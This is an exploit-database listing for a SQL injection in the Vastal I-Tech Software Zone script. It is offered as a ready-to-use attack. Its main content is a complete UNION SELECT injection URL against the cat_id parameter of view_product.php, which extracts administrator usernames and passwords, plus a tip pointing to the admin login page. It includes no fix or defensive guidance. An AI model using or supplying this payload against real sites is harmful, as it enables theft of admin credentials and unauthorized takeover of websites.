[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2808
Category
web applications
Date add
03-04-2008
Platform
unsorted
================================================================
Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability
================================================================



--==+================================================================================+==--
--==+		         Software Zone SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.vastal.com/software-zone-a-script-for-selling-your-softwares.html
DORK: N/A


DESCRIPTION: 
pull out admin user:pass


EXPLOITS:
http://www.server.com/view_product.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(admin_user,0x3a,admin_password),7,8,9,10,11,12,13,14 FROM/**/admin_users/*


NOTE/TIP: 
administrator login is at /admin/




#  0day.today [2024-11-15]  #